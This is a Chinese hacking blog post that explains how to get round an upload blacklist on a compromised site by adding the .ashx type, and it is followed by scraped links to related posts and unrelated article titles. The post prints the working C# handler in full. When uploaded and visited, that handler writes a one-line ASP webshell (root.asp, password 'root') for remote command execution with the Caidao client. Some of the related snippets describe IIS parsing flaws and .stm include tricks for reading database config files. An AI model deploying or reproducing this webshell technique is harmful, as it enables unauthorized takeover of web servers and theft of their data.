滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型
今天日一站
发现后台可以设置上传类型,但是asp,asa,cer等等都不行,上传之后就提示下载
尝试着关闭了下了,还是不行,后来找到了一位前辈写的文章
过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,
脚本内容如下:
www.92hack.net/ashx.txt
然后访问上传后的ashx文件,就会在同目录下生成一个root.asp的一句话木马,然后使用一句话木马客户端连接即可。利用方面就大家自由发挥了!
密码为root,果断菜刀连之
<%@ WebHandler Language="C#" class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
没有最牛逼的方法,只有最爱思想的脑子
by:狗一样的男人
滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型相关推荐
- 突破asa,cer,cdx,php,aspx 上传
发现后台可以设置上传类型,但是asp,asa,cer等等都不行,上传之后就提示下载 尝试着关闭了下了,还是不行,后来找到了一位前辈写的文章 过滤了asa,cer,cdx,php,aspx等脚本类型的上 ...
- IIS6.0 asp.asa.cer.cdx. 原理
IIS6.0存在两种解析漏洞: 第一种是修改后缀,建立一个"*.asp;.gif"的文件,windows会将他作为一个图片解析,但IIS不会. 第二种是在目录下建立一个" ...
- IIS6.0文件解析缺陷(asa,cer,cdx)
IIS对文件解析可以用ISAPI扩展. 有的网站在上传检测中会用"黑名单"方法,但是有时会忽略asa.cer.cdx扩展名文件上传,以至于webshell上传成功. 这是因为默认情 ...
- 网站不允许上传asp cer cdx htr等文件时
当网站不允许上传 asp cer cdx htr等文件时, 上传一个stm文件, 内容为: <!--#include file="conn.asp"--> 直接请求这个 ...
- 不允许上传asp cer cdx htr文件时解决方法
一段代码: <!--#e cho var="ALL_HTTP"--><br> 当前文件名称:<!--#e cho var="DOCUMEN ...
- 当网站不允许上传asp cer cdx htr文件时的一个解决方法!
From:http://www.neeao.info 在此感谢lcx大哥! 前些天向lcx大哥求教关于web上传的问题,说起利用stm来上传,还能执行程序,不解,就给我了一段代码: 见lcx大哥给的一 ...
- 当网站不允许上传ASP,CGI,CER,CDX,HTR等类型的文件时
方法:上传一个shtm文件, 内容为: <!--#include file="conn.asp"--> 直接请求这个shtm文件, conn.asp就一览无遗, 数据库 ...
- 3万字通俗易懂告诉你什么是.NET?什么是.NET Framework?什么是.NET Core?
通俗易懂,什么是.NET?什么是.NET Framework?什么是.NET Core? 什么是.NET?什么是.NET Framework?本文将从上往下,循序渐进的介绍一系列相关.NET的概念,先 ...
- 【转载】通俗易懂,什么是.NET?什么是.NET Framework?什么是.NET Core?
什么是.NET?什么是.NET Framework?本文将从上往下,循序渐进的介绍一系列相关.NET的概念,先从类型系统开始讲起,我将通过跨语言操作这个例子来逐渐引入一系列.NET的相关概念,这主要包 ...
最新文章
- linux I/O--I/O多路复用--select总结(三)
- GDB调试程序实例演示
- hapi 获取 请求地址 url
- bash颜色、变量、数组、相关脚本示例
- vue生命周期详解、钩子函数的调用(简单易懂)
- B程序员:讲述三年计算机学习辛酸史
- Redis学习---(3)Redis 配置
- BZOJ 1911: [Apio2010]特别行动队 [斜率优化DP]
- 名震GitHub,字节跳动内部顶级数据结构刷题学习笔记根本停不下来
- 骨传导有什么品牌,骨传导耳机品牌推荐
- truffle init/unbox 中遇到的许多错误以及解决
- 转载:80端口、443端口、8080端口、8000端口的区别
- 免费资源分享(六) Unity3D 雷达实时定位插件
- 完美解决IIS 服务器无法加载应用程序 '/LM/W3SVC/1/ROOT'。错误是 '没有注册类别
- 国企的面试我们应该怎么准备?
- opencv生成棋盘格
- 李子柒:不希望年轻人当网红...
- 微信小程序:更改字体(text)和图标(icon)的颜色以及RGB颜色值与十六进制颜色码之间的转换
- Ubuntu 查看内核版本
- 抓包和网络镜像 华为交换机S2300
热门文章
- thinkphp5之腾讯视频hls片批量多线程下载自动合成mp4
- 蚂蚁链开源跨链技术 加速大规模创新应用“涌现”
- unity3d android jar,c# – 访问unity3d中的android jar
- 2018年最全Go语言实战抽奖系统教程
- 卸载计算机更新程序包,Win7清除Win10更新安装包的方法
- Vista不是黄金甲
- 新加坡金融科技节 | 蚂蚁金服CTO程立:面向全球开放,与合作伙伴共赢 1
- “新四大发明”走出去:“小鲜肉之国”孟加拉也有“支付宝”啦
- 企业运维容器之 docker仓库
- [卓意听书]6月感恩活动,Q币送不停!